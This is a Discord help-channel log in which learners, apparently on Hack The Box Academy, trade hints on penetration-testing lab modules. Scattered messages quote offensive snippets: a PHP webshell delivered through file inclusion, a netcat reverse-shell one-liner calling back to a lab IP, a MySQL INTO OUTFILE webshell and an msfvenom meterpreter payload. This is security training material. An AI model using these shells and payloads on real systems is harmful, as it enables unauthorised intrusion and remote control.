i swear i am going insane how does mssql work in cli

#

i cant find anythin from google or it doesnt work

autumn pilot
#

if you are trying to make it execute commands on the system, then you first must ensure that this "operation/operator" is enabled

sudden oracle
#

Hi, does anyone know how to enable CPE credits under the VIP account? I don't seem to have the option at all

autumn pilot
#

settings -> private information -> vault

sudden oracle
autumn pilot
#

also if you are using sqsh, you have to type "GO" and run it to execute the query that you had prepared

turbid tartan
#

im using mssqlclient but simple sql statements dont work

rustic sage
#

A general question regarding all the MSSQL questions. Is there a way to get align the output in impacket-mssqlclient? For example when i try to view data in tables the output get's all scrambled, making it very hard to read. Or is my impacket-mssqlclient just broken??

merry cliff
#

Hi

livid bluff
#

HI,
On Password Attacks Lab - Hard
I download the vhd file but the file is empty.
I looked at several resources to mount a vhd file and I have a problem installing the libguestfs-tools lib.
If anyone has any clue on the correct way to download the file and mount it.
The only way I found to upload the file is with smbmap :
smbmap -u user -p password -H 10.129.15.198 --download .\user\file.vhd

manic perch
rustic sage
#

SELECT name FROM master.dbo.sysdatabases

#

GO

#

But nothing happens.

turbid tartan
#

and i cant find the mssqlsvc user in the database

rustic sage
#

ow nvm, i forgot ';' at the end

rustic sage
livid bluff
merry cliff
#

Can anyone help me please ?

rustic sage
#

I'm still struggling with dsquery🫠 anyone free for a dm so I don't spoil the question? It's the last question of laying off the land in AD Enum & Attacks. Using dsquery and ldap to find the flag in the description of a disabled account with admin privileges

slender kelp
#

How do I get a gui too see nessus in the vuln assessment module? It seems like it should be run from the target machine, not the attack box, but xfreerdp doesn't work

rustic sage
slender kelp
#

Right, nvm. Discord added the final / for me but I hadn't done that in the address bar, that's why it didn't work

#

Thanks @rustic sage

#

(the earlier section "getting started with nessus" mentions ip and port but not that it's required to add a slash are the end)

slender kelp
#

.. Actually it doesn't work at all now, even after resetting

manic perch
cunning marsh
#

yo thanks for this man. I was stuck on this for 2 days had to search thru this history.

#

should've been taught in the modules

unborn patio
#

Hello

livid bluff
autumn pilot
#

find a way to mount smb, as the file is quite big it will likely timeout and corrupt the file transfer

unborn patio
#

Hello

#

Hello

desert stump
#

Anyone here good with PS Empire

slender kelp
desert stump
#
crackmapexec smb 10.129.2014.178 -u robert -p 'Inlanefreight01!' -M empire_exec -o LISTENER=http
/usr/lib/python3/dist-packages/paramiko/transport.py:236: CryptographyDeprecationWarning: Blowfish has been deprecated
  "class": algorithms.Blowfish,
EMPIRE_E...                                         [-] Unable to connect to Empire's RESTful API: HTTPSConnectionPool(host='127.0.0.1', port=1337): Max retries exceeded with url: /api/admin/login (Caused by SSLError(SSLZeroReturnError(6, 'TLS/SSL connection has been closed (EOF) (_ssl.c:997)')))

I am gettin g this error

#

Have confirmed the API is running

mortal basin
flint drift
#

Hey guys, I hope this is the right place to ask this. I just completed the LFI module in the academy and just had a question about URL encoding. When do you know to URL encode vs when to not? For example we encode the webshell "/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E" but not the COMMAND: ?language=/var/lib/php/sessions/sess_rq2rp1ehi08i58doec2adragi4&cmd=id. Thanks and sorry if thats a long block of text!

unique valve
sonic ferry
#

Is it normal that I have to keep resetting the targets all the time? For example on the Nmap-module, after each scan the target becomes unresponsive and I have to reset it. This system seems to have major stability problems when compared to other similar sites

analog tendon
iron basin
#

File Upload Attacks - Type Filters: Can anyone give a nudge? I am able to upload a file but not able to get the directory to properly execute the php code.

autumn pilot
#

have you tested your nested extensions?

dim wolf
#

lots of web modules recently

#

web is too big

iron basin
autumn pilot
#

also you have modified the content-type right?

#

and you have added some magic bytes as well?

iron basin
#

The only magic byte that I have been able to get successful is || GIF 8 and I change the content type to image/jpg, image/png, and image/gif. ||

autumn pilot
#

so far so good, try to focus on the filename extension

iron basin
#

Ye, I know I'm close just tryna figure out what last part is wrong. Gonna take a break for a couple mins to reset the brain lol

autumn pilot
#

yup, thats a good idea

turbid tartan
#

my flag at attacking common service doenst work dns section

autumn pilot
#

check for white spaces

turbid tartan
#

i already checked

acoustic owl
candid sedge
#

Hello! Everyone I am new here

summer flame
#

Hi, I need some help for Pivoting, Tunneling, and Port Forwarding module, in the Skills Assesment. How do I transfer the Mimikatz to 172.16.5.35? I cant seem to ssh from either attack host or foothold host. Thank you.

astral basin
#

my college domain is not registered on HTB website !! how would i take student pack

acoustic owl
astral basin
#

okh sry

pliant flame
vague hedge
#

What is the type of the service of the ''syslog.service"?

#

I wrote systemd service

#

But it's wrong

vital adder
vital adder
vital adder
rustic sage
rustic sage
vital adder
#

oh yeah i did saw that module got some update but i haven't done that 🤣

silver zenith
#

So can someone answer this

iron rune
#

try systemctl or jorunalctl, maybe systemd

silver zenith
#

With the htb academy modules

#

When there is an update with a module

#

U can see that in blue at the right top

#

Is an update always a nee section

#

Or could it also be a old section that is updates

#

And if so how do i know what is new?

#

When an update is a whole new section ots clear

autumn pilot
#

in the changelog

silver zenith
#

Ai tnx

raw sierra
#

@cunning prairie

tight mesa
#

How do I find nessus on the instance running? I'm completing the vulnerability assesment module, but not seeing nessus. Also not seeing the prepopulated scan results anywher

livid quest
#

Hello there, i'm at the start of the windows fundementals Module, but it seems i've got some issues with xfreerdp, i can't connect most tries, and even when it connects then i'm getting cut off after a minute or so

steady hawk
wintry lark
#

Hi. Can anyone help me with "Getting Started Privilege Escalation" ? I have made it to user2 and find id_rsa. I copied the content of the id_rsa and created a file on my computer with the same name and content.

On victim's machine
Cat id_rsa
Copy the content from id_rsa

On my machine
Vim id_rsa
Paste the content
Chmod 600 id_rsa
i try to connect ...
||└─$ ssh user2@165.227.228.154 -p 30076 -i id_rsa
Load key "id_rsa": Permission denied||

What am I doing wrong?

#

still need to enter the password for user2

iron basin
#

@autumn pilot Hey, may I ask, is PNG apart of any of this?

#

@wintry lark What are the permissions on the id_rsa file?

livid quest
# steady hawk Check that you don't have a pwnbox instance open at the same time you're connect...

Hey thanks for the info, yeah Openvpn was still running, but the issue is still the same, even after killing the openvpn process. I also tried via the browserversion of the pwnbox, but there a get another error:
[18:59:14:690] [4992:4992] [ERROR][com.freerdp.client.x11] - failed to open display: :1
[18:59:14:690] [4992:4992] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.

autumn pilot
steady hawk
livid quest
wintry lark
iron basin
#

@wintry lark run the command on sudo, or change it permissions. But when ssh goes to grab to use that file it has to have certain permissions for you to execute but also cannot be to exposed permission wise.

faint trellis
#

Hey there!
I stuck for a few days on Weak Public/Private Keys section of the Attacking Authentication Mechanisms module 😐 , still can't receive the JWT from the response.

I have:
imported pub.crt and privat.pem;
changed logged in username value to hackme;
assertions successfully signed

however my request still attempting to redirect me back to the root web directory.

Can someone tell me what have I missed ?

tiny ledge
#

Can someone help me with this question: Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer. - In Web Service and API attacks - Information Disclosure (with a twist of SQLi)

#

I´'ve tried searching for this exact ID and the area around it with the script but finding nothing

faint trellis
wintry lark
faint trellis
analog tendon
#

i have a new hatred for MSSQL

tiny ledge
faint trellis
distant tinsel
#

How do I use dsquery to search for a user with administrator privileges and disabled for the Active Directory module

#

I can search disabled accounts easily I just don’t know how to search for admin perms and googling ad help is hard

tiny ledge
iron basin
#

@autumn pilot Can I dm ya?

autumn pilot
#

sure

faint trellis
tough spindle
#

Hola y'all

warm flint
#

there is something wrong with target alive time. It says 90 minutes when i spawn it after 10 minutes its down to 30 or something like that

rich light
#

Has anyone gotten the LOGIN BRUTE FORCING Skills Assessment - Website to boot up? The IP + port it indicates doesn't show up. I have been resetting for a while now

dim hound
rich light
#

It might just be malfunctioning then. Tried it inside the parrotvm instance and on my own machine

rich light
#

Maybe HTB is getting overloaded by people bruteforcing 😆

#

The password bruteforcing should really be dialed back. It seems like a staple of every module

dim hound
#

which SA are you doing, since you have 2 SA's? @rich light

vague hedge
dim hound
rich light
#

Hmmm.. That is annoying

#

Am I blocked

#

It is a public IP after all

dim hound
#

It's public IP.. you should be able to use this iP + Port as well.

rich light
#

Alright, resetting again got it to finally work

#

@dim hound Thanks for the second set of eyes

dim hound
#

No worries! Good luck 😁

#

Atm I am re-doing broken authentication tho! I do think that's one of my fav

#

I planned my exam (CBBH) at the 17th of Aprillightsaberpepe

vague hedge
rustic sage
#

if you still can't find it feel free to DM and I'll help you

rustic sage
narrow ravine
#

hey guys, i hope yall doing well, so i've been trying to do this question, but i cant even do the nmap scan, is there something i am doing wrong

#

the question is "Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)" from the getting started module

tiny ledge
#

Can someone help me with this, it's exactly like in the instructions, and I'm supposed to find the position: 736373 -

#

Shouldn't I see it if I replace the number with the one I'm looking for ?

rustic sage
#

Has anyone done the ACL Enumeration section of AD Enum and Attacks and remembers how many rights forend has over the GPO Management group? Bloodhound shows only 2 for me and neither work as answers... Curious if I'm doing something wrong or if Sharphound missed something

modest isle
vague hedge
modest isle
#

Nice

#

That's Notify service

silver zenith
#

Can someone help with attacking email services

#

Found pass for m*****

#

Logged in

#

But dont seem to find email

livid zephyr
# violet prism hlo im new

it is not that easy. If you don't have an antivirus that can detect the malware and remove it, you need to do some forensics. Use wireshark , a process monitor, review some log files to start with in order to identified the malware file. Once you identified it, you need to reverse engineer it to try to figure out all the objects is drop into your system and what it does. Once you know, it makes it easier to figure out what to do to remove it. The easier thing would be to reload a backup if you have one.

rustic sage
elfin nacelle
#

Can someone help me with the File Upllad Attacks - Skills Assessement. I fuzzed. I read the source code for index and upload and located the upload directory. I get the following error when trying to visit my upload:

"The image "http://Path_To_Upload_Directory.jpeg" cannot be displayed because it contains errors."

Can someone give me a hint please?

opaque niche
#

hello in the Pivoting, tunneling, and portforwarding module I have a problem specifically in "SOCKS5 Tunneling with Chisel", I am trying to run chisel but I have the following error: ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.4' not found (required by ./chisel),
I was trying to download old versions and I still have the same error, any ideas?

quick cairn
#

any help with question, "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_). i have tried everything and steel not working

silver zenith
#

Amd openssl is not working

#

Help

tight mesa
#

Can someone help me with the vulnerability assesments module? Nessus isn't on the pwnbox. How am I supposed to complete the nessus skills assessment?

silver zenith
#

Openssl is not working and ports 993 and 995 are filtered

hazy grotto
quick cairn
worldly arrow
#

Anyone here running nethunter termux? Can't get the vnc server to connect

hazy grotto
crisp thunder
#

THIS IS SPARTA

analog tendon
silver zenith
#

Forget it its done

analog tendon
tight mesa
rustic sage
# tight mesa How do I access it?

Navigate to the web interface at the end of this section and log in with the provided credentials. Read the requirements section before jumping to the question

tight mesa
analog tendon
#

a web-based gui. once you start the nessus service you go to localhost:<theportitgivesyou>

#

in firefox

rustic sage
analog tendon
#

oh sorry yea the ip for the machine. localhost is for running on your own machine

tight mesa
analog tendon
#

did you do the port as well? should be ip:port

tight mesa
#

I just tried it again and now it says Bad Request

Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL-enabled server port.
Instead, please use the HTTPS scheme to access this URL.

analog tendon
#

well try https.

tight mesa
#

I just tried https and it worked!

#

Thank you!

analog tendon
#

np

tight mesa
#

I'm having the same issue now with openvas. Does anyone know the port i navigate to? I tried 9392, but that didn't work

analog tendon
#

it should be the same thing just a different port. error?

hidden trellis
#

can someone please help me with broken auth skills assessment... I have the user and password but unable to change the cookie.................got it sorted

sonic moon
#

Hello. I really need help with Attacking Common Services Hard. I wanted to do all modules by myself but after spending 2 weeks of research, I'm literally beating my head against the wall. So far, I know that I need to impersonate the *admin on the linked mssql server to enable xp_cmdshell. The problem is I'm not able to find the correct syntax. Is there a good Samaritan to give me a hint please?

Nevermind. After asking my question, my brain waked up and I finally caught it.

tight mesa
#

can I get a nudge on the getting started module knowledge check? I am trying to obtain the root flag. I downloaded LinEnum.sh, and ran it using "bash LinEnum.sh", but all it resulted in was a bunch of text to the terminal then scan complete

iron rune
#

you have to read the results, it'll come back with what it found, from there you can look for processes or other exploits. usually the best results are towards the end of the report

tight mesa
#

I don't see any processes or other exploits listed

#

I found the section of user can run the following commands, but it just says ALL

magic valve
#

May I have some help with Pivoting, Tunneling, and Port Forwarding - Meterpreter Tunneling & Port Forwarding. I'm trying to utilize the meterpreter payload shown in the module to attempt to receive a meterpreter session. I keep on receiving the following and the command shell session gets closed immediately.

rustic sage
#

hey anyone can guide me regarding bug bounty

fathom pendant
naive sky
#

could i dm please

#

i need some help

fathom pendant
magic valve
fathom pendant
#

Help with ehat

faint trellis
#

Hey there!
I stuck for a few days on Weak Public/Private Keys section of the Attacking Authentication Mechanisms module 😐 , still can't receive the JWT from the response.

I have:
imported pub.crt and privat.pem;
changed logged in username value to hackme;
assertions successfully signed

however my request still attempting to redirect me back to the root web directory.

Can someone tell me what have I missed ?

fathom pendant
fathom pendant
#

If that's what it's expecting

magic valve
fathom pendant
#

Iirc stands for "if I recall correctly"

frigid ingot
#

in need of a nudge in the metasploit module if anyone could assist

fathom pendant
#

That section though I think walks you straight through it

uncut mirage
#

Hi all,
I'm in the Active Directory Enumeration & Attacks, Attacking Domain Trusts - Child -> Parent Trusts - from Linux section. ||I'm very confused by this lab. I've tried to get the NTLM hash for user bross by doing what is decribed in the section text, but it seems to be targeting the child domain and not the parent domain? So I tried targeting inlanefreight.local and freightlogistics.local but neither htb-student or htb-student_admin seems to exist on those domains. Using nmap I found that 172.16.5.240 is logistics.inlanefreight.local so if I want to hit the parent domain I will need a completely different IP address? How do I find this IP? Why are there no enumeration/recon section for the Linux section? Am I even on the right track?||

magic valve
frigid ingot
#

@magic valve could i get an assist on the metasploit module?

naive sky
#

could i ask

fathom pendant
#

Help with what? You haven't asked your question

naive sky
#

iam confused with this secrion

magic valve
fathom pendant
#

That is the most verbose question

naive sky
fathom pendant
#

It tells you exactly what to do

naive sky
#

i have tried but doesnt give me anything

#

looks wrong

#

what i have done

fathom pendant
#

It tells you you have an incomplete cookie and to fuzz it until you get one that works

naive sky
#

how to do it the right one

#

please could you check mine

#

the right way to fuzz from hash last letter after that to encode

fathom pendant
#

No, I haven't done that one, but I'm sure someone who has done it can answer your question better, in the meantime, reread the section

naive sky
#

anybody done that please inform me

tiny ledge
#

Anyone help me with: WEB SERVICE & API ATTACKS -- I need to use SQLi to get 'user that has a position of 736373' There is no mention or example of SQLi in the chapter, the instructions in the section does not seem to have anything to do with this task

tardy sorrel
#

Anybody help me..wt is the type of service is 'syslog.service'.

fathom pendant
#

Google

thorny wadi
#

anyone that has done AD Enumeration & Attacks - Skills Assessment Part II? I need a nudge on Q8

magic valve
magic valve
turbid tartan
#

my flag doenst work

native marlin
#

Hi could someone help me for Command Injections - Skills Assessment ?

fallen epoch
#

can someone help me with the gettingstarted knowledge test?

#

can i DM someone?

low vine
#

Okay so this cant be hard, Hacking Wordpress - Login
I'm curling <methodCall><methodName>system.listMethods</methodName><params></params></methodCall>
But the response I'm getting I'm not understanding how this is showwing me the list of methods?

stiff kite
#

hi

#

IS THER ANYONE WHO KNOWS HOW TO OPEN A PASSWORD PROTECTED WORD DOCUMENT WITHOUT PASSWORD

#

if anyone knows, please let me know

#

it's very urgent

tight mesa
placid quest
#

@tight mesa which problem are you facing

tight mesa
placid quest
#

@tight mesa use sudo -l

#

@tight mesa what do you see

tight mesa
fallen epoch
tight mesa
fallen epoch
#

just that?

placid quest
#

@tight mesa switch to root

fallen epoch
#

which exploit are you using?

tight mesa
tight mesa
fallen epoch
#

nvm i got it working

placid quest
#

Use cat /root/root.txt

fallen epoch
#

it was apparently just an internet problem

tight mesa
tight mesa
worthy briar
#

Can someone help me on the Internal Password Spraying - from Windows?
Can't rdp. xfreerdp just shows the window all black. rdesktop says the credentials are incorrect 😂 . Iam able to use evil-winrm but the DomainPasswordSpray tool just freezes.

tight mesa
placid quest
#

@tight mesa return to home directory

#

@tight mesa how many users do see

tight mesa
placid quest
#

@tight mesa what about sudo su

tight mesa
tight mesa
placid quest
#

@tight mesa use whoami to see who you are on the system

placid quest
#

@tight mesa ok use locate or find to find the flag using wildcard

tight mesa
#

what's wildcard?

placid quest
#

@tight mesa like using *

tight mesa
placid quest
#

@tight mesa use locate *.txt

#

@tight mesa anything

tight mesa
#

I have to go soon, ugh I feel like I'll never crack this

#

I'm going to post in the htb forum

placid quest
#

@tight mesa you can do it 💪 use pwd which directory are you in

tight mesa
placid quest
#

@tight mesa can you dm me with the screen shot

rustic sage
#

Hi, im working on Attacking Common Applications - Skills Assessment II , but i stuck on this question: What is the admin password to access this application? any tips/ ideas ?

rugged temple
#

hello, i am doing the getting started module and the nibblers box, it says that it doesnt need a password for executing a monitor.sh file, but when i do it it asks for the password

'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh 

this was appended to the monitor.sh file after gaining the initial access as told by the module to do so, but while doing sudo /home/nibbler/personal/stuff/monitor.sh
error comes:

'unknown': I need something more specific.
/directories/ [[: not found

and when i do normal sudo it asks for a password, but according to the module this wasnt supposed to happen

posted this in #1083005652147904562

tall saffron
#

in the modules like footprinting SMB part, there is commands as examples like we have to do them like an exercise but the ip doesnt resolve to anything

#

the practice is only the questions at the end??? or we must follow the examples like this

plain coral
placid quest
#

@lyric raft yeap look for the version of snmp

#

@lyric raft no

#

@lyric raft use nmap

livid bluff
#

HI,
For the module attacking commom services in Attacking SQL Databases.
I am connected with the given identifiers except that I have no access to anything.
When I list the users I can't even find htbdbuser and I can't find mssqlsvc either.
I'm a bit lost when I do select user_name() apparently I'm a guest but when i do SELECT * FROM flagDB.INFORMATION_SCHEMA.TABLES; i have this response :
The server principal "htbdbuser" is not able to access the database "flagDB" under the current security context.

placid quest
#

@lyric raft did you scan the udp

#

@lyric raft the version cannot be different

turbid tartan
#

in the db is a user that is allowed

placid quest
#

@lyric raft yes

#

@lyric raft that is the version

turbid tartan
#

im stuck at the easy lab common services i cant get access to the server what am i missing?

#

i tried to brute force ftp mysql rpd

livid bluff
rustic sage
#

hellou

#

im trying to solve a module but i have problems

#

can somebody help me?

#

this is the exercise Crack the following hash using the rockyou.txt wordlist: 0c352d5b2f45217c57bef9f8452ce376

#

this is what im doing sudo hashcat -m 0 '0c352d5b2f45217c57bef9f8452ce376' /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz

autumn pilot
#

you need to fix your rockyou file

uncut sequoia
#

Fix: extract it

#

It's still a gzip archive

rustic sage
#

thank u

#

it works

kind turret
desert stump
#

Hey, I am on the skills assesment part of the CrackMapExec module.
"Your first task is finding a valid account and trying a common password using different protocols."
I have tried all protocols - local and domain login
with all usernames and passwords that were mentioned during the course training,
I haven't had a single hit yet.
The hint says: Review "Exploiting NULL/Anonymous Session", what can you use to enumerate users?
I still get access denied when trying any of these methods.

#

A nudge would be helpful if possible

crimson walrus
#

For SHELS AND PAYLOADS: LIVE ENGAGEMENT
Hi guys, I am currently stuck on host 1. I am unable to upload a .war file onto the target. I tried everything - online scripts, msfconsole and whatnot. I do not have a browser on the attacker machine which makes things a lot harder since I am unable to upload to tomcat manager with 'curl'. Any help would be greatly appreciated.

desert stump
west canopy
# desert stump

we need to use the ||spawned target as a pivot host, then use proxychains crackmapexec to target the machines in the internal LAN||

steady hawk
west canopy
#

for shells and payloads we can launch firefox from the command line

lethal atlas
#

good to see you jared

native hound
#

Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer.

#

i have found how to decode the HTBPERSISTENT cookie

#

how do you reencode back after modifying the value?

smoky chasm
#

Shells & Payloads Laudanum, struggling with 2nd question, I've submitted a few and none are right

storm jackal
#

Can someone please help me with SQLmap skill assessment 🙂

echo roost
#

To be more specific Information Gathering - vhosts question#3

acoustic owl
tall saffron
# tall saffron

So it just mean to be exemples and not something we must do in our side?

echo roost
storm jackal
analog tendon
#

is anyone else having issues attacking common services easy lab? seems all my brute force techniques get closed out due to errors

opaque niche
#

Hello, in Skills Assessments of Pivoting, tunneling and port forwarding, I have a problem in question 4, which is basically connecting to the windows machine, I was doing|| chisel and meterpreter|| but when connecting to the windows machine I have timeout/error problems (||I have the user webadmin and the credentials mlefay , as well as the ip x.x.5.35||) any ideas or hints?

lethal atlas
#

im stuck on SMB attacks

magic valve
fathom pendant
#

i guess if it says use TCP, use TCP ¯_(ツ)_/¯

analog tendon
lethal atlas
vale crescent
#

Hey where can i learn burpsuit from the beginning for free?

magic valve
#

No worries @fathom pendant . Thanks for trying to help anyway 😃 . Anybody, may I have some help with Pivoting, Tunneling, and Port Forwarding - Meterpreter Tunneling & Port Forwarding. I'm trying to utilize the meterpreter payload shown in the module/shown below to attempt to receive a meterpreter session. I keep receiving the following, and the command shell session closes immediately. i've attempted to reboot the machine multiple times but still receive the same thing.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.37 -f elf -o backupjob LPORT=8080

analog tendon
sinful olive
#

Can I DM someone about Abusing ACLs? I am stuck.. getting many errors..

rustic sage
#

Really need some help with the terrible so called "easy" lab in Attacking Common Services. I've managed to brute force the credentials for ||fiona@inlanefreight.htb|| i have also found the ||documents on the FTP server||. I went through all the tables in MySQL. ||i have tried SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:/xampp/htdocs/webshell.php';|| But when i go the URL i get an error: Notice: Undefined index: c in C:\xampp\htdocs\webshell.php on line 1

Warning: shell_exec(): Cannot execute a blank command in C:\xampp\htdocs\webshell.php on line 1

lapis slate
rustic sage
#

Been stuck on this horrible lab for hours, without any way to proceed.

tall saffron
tall saffron
#

give one and you will see the error will not be there after

tidal lark
#

hi

#

what does it mean to properly format the code?

fathom pendant
#

Proper indentations

tidal lark
#

context: "this is known as Minified JavaScript code. In order to properly format the code, we need to Beautify our code."

weak stirrup
#

I am working on "DNS Enumeration Using Python" your python code is very package version dependent and you don't supply a virtual environment or requirements.txt ---- GROSS

analog tendon
#

ah so i guess i just had to slow down hydra. no errors so far

rustic sage
#

I don't know how to proceed with this.

grim gust
#

The lab in the academy are so slow 😦

#

10.129.25.97/nibbleblog/admin.php?controller=plugins&action=list

#

constant timeouts 😦

tall saffron
#

shell_exec($_GET['c']) in your webshell means that it will execute whatever you give after the GET parameter called c

rustic sage
analog tendon
#

im still having issues on this common services easy lab. was able to start bruteforcing a service with the f user but its been going on for 10k passwords on rockyou.txt. any nudges?

rustic sage
rustic sage
grim gust
#

The lab in the academy are so slow 😦
10.129.25.97/nibbleblog/admin.php?controller=plugins&action=list
constant timeouts 😦

analog tendon
#

and what do you know. i found the password now

analog tendon
#

errors or access denied?

rustic sage
rustic sage
# analog tendon errors or access denied?

I have managed to read the contents of ||passwords.txt|| the file gives more instructions and credentials, i'll try and continue this tomorrow. Getting sick of it for today. I can't believe this is just an "easy" lab, supposedly, could be me, but it sure as hell doesn't seem easy to me, ugh.

analog tendon
rustic sage
#

Yeah, i can imagine. Some of these labs are just terrible imo and don't connect to the material in the module at all. If this is to be any indication for the exam, it's going to be rough, really rough.

tiny ledge
#

Can someone assist with: WEB SERVICE & API ATTACKS - Question: Identify the username of the user that has a position of 736373 through SQLi. | I have located the vulnerable parameter and SQLi using SQLmap, but I don't understand how to get the info for the position with this knowledge.

echo roost
#

Question about this one - Web Edition - Virtual hosts: Find the specific vHost that starts with the letter "d" and submit the flag value as your answer (in the format HTB{DATA}). Did anyone use the 2nd zone to find the vhost starting with a "d" The instructions say you only need www.inlanefreight.htb to solve those questions. I've used the seclist/discovery/dns/namelist with ffuf gobuster and dirb. I can't find the last vhost. Can someone please throw me a hint?

iron basin
#

File Uploads - Skill Assessment:

Bruh what just happened, managed to capture a request and change data to some xml that shows base64 encoded source code of the page. Got it but realized it was for the wrong page, tried it again and now the same method doesn't work lol.

#

Infuriating xD

hazy grotto
#

Did anyone ever get this to work?

echo roost
#

What tool did you use ffuf?

#

what tool did you use?

tidal lark
#

hey, is a "serial" also known as a petition?
context
The developers may have implemented this function whenever they need to generate a serial, like when clicking on a certain Generate Serial button, for example.

elfin nacelle
#

Can someone help me with the File Upllad Attacks - Skills Assessement. I fuzzed. I read the source code for index and upload and located the upload directory. I get the following error when trying to visit my upload:

#

"The image "http://Path_To_Upload_Directory.jpeg" cannot be displayed because it contains errors."
\

#

Can someone provide a hint?

rustic sage
analog tendon
steady hawk
iron basin
#

@elfin nacelle may I ask how you read the source code? I got mine to work the first time somehow but now it doesnt want to work lol.

rustic sage
analog tendon
#

i may try that. but i do want to know how to get this webshell working just so i know for future reference. the shell was pushed into the ftp and curl just pulls the file in a readable format. cant seem to find it on the webpage itself to start

steady hawk
echo roost
desert stump
rustic sage
elfin nacelle
iron basin
# steady hawk Did you try ||XXE with an SVG file?||

Yes, I am sincerely confused as I captured a request of uploading a jpg file, ||simply decided to tinker with XXE method and just replaced the content with it, and it gave me the source code but it was for the index.php page. I went to redo what I did and it didn't work. I didn't change the content type on the original one as I was shocked to see that it worked. But now it doesn't. But anyways lol.. how could one get an svg file across? Lemme recheck but I thought it didn't allow svg file uploads. I have been messing with the content type and switched it to image/svg+xml but I keep getting internal servr errors everytime I add my payload ||

analog tendon
iron basin
rustic sage
#

It's under writing files to MySQL or something.

steady hawk
analog tendon
rustic sage
#

Yeah, it's a horrible lab, imo.

#

I'll start the other two tomorrow. Done for today.

analog tendon
strong spruce
#

Could anyone explain this calculation to me ? I have a hard time understanding this one

#

Its from the Module: Stack-Based Buffer Overflows on Linux x86 in the "Determining the length of the shell code section"

iron basin
iron basin
#

|| Ffs, tried uploading svg file after deleting the accept stuff, didnt work. Decided to try to delete it and try a regular png file, capture request and change contents, it worked but I realized I had the source code for index.php again and not the upload.php lmao. Tried doing same steps and didn't work, lemme try tinkering with it again. ||

steady hawk
elfin nacelle
flint drift
#

If anyone has done the Whitelist Filters module in the academy I could really use a nudge.

steady hawk
thorny wadi
elfin nacelle
elfin nacelle
thorny wadi
#

anyone completed Web Proxies that can give me some help ?

jade holly
#

hello how can i link my htb account on discord

analog tendon
#

using the ++verify

flint drift
#

I have posted on the fourum as well, the Whitelist Filter challenge under File Uploads section in the academy. I have tried all of the techniques, am able to find some paths to upload to but none of them are rendering my php. When uploading with the bypasses the path my images are going to is .jpg or .png not a .php path as described in the exercise. Any help would be awesome thanks in advance.

EDIT: GOT IT

thorn urchin
#

i.e if youre just copy pasting from the section instead of actively applying the information then itll never work

flint drift
# thorn urchin i.e if youre just copy pasting from the section instead of actively applying the...

Yeah man I am actively applying the information, I have been at this for 2 days and I finally got it. I was just looking for a nudge, I had already expanded the wordlist. I was thinking none of the files were being creating in the directory with the extension. As I was getting pages returned when just going to .jpg or .jpeg but when I added the full file path of my succesfully uploads I got it.

thorn urchin
flint drift
modest token
#

Module Password Attacks
Section Pass the Ticket (PtT) from Linux
Question : Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
I can get the flag from the share but it is not accepted. Has anyone been able to fix this issue?
Edit: So, I guess there are two flags ... the one you find in \DC\01\julio doesn't work, but there is a second flag in a different location that works...

analog tendon
radiant marten
#

I need some help with SQL map essentials OS exploitation, once I get to the os-shell I can't go anywhere, I've uploaded shell.php to the target but don't "hear" anything on netcat... any help into the right direction of finding the 2nd flag would be greatly appreciated.

marble stirrup
#

Can someone DM me to help me hack my roblox account back? I can prove it is mine, I have evidence

#

Im willing to pay accounts with high value

analog tendon
fickle river
#

Module: Vulnerability Assessment
Section: Nessus skills assessment.
Question: Is it known that the log4j plugin isn't running correctly? This caused a lot of headache with resolving the question
"What is the plugin ID of the highest criticality vulnerability for the Windows authenticated scan?"

#

Was only able to answer the question by reviewing the pre-populated scan information

fathom pendant
tardy beacon
#

trying to figure out "Find the password for the ldapadmin account somewhere on the system. " from windows privesc module, can someone give a hint?

obtuse summit
#

one thing i wanna ask is

#

am new here

#

so

#

i cant do the connect to htb

#

in there website

#

you know??

#

so can someone help me?

hallow trail
#

that site?

obtuse summit
#

yeah

hazy grotto
#

Are you able to help with this?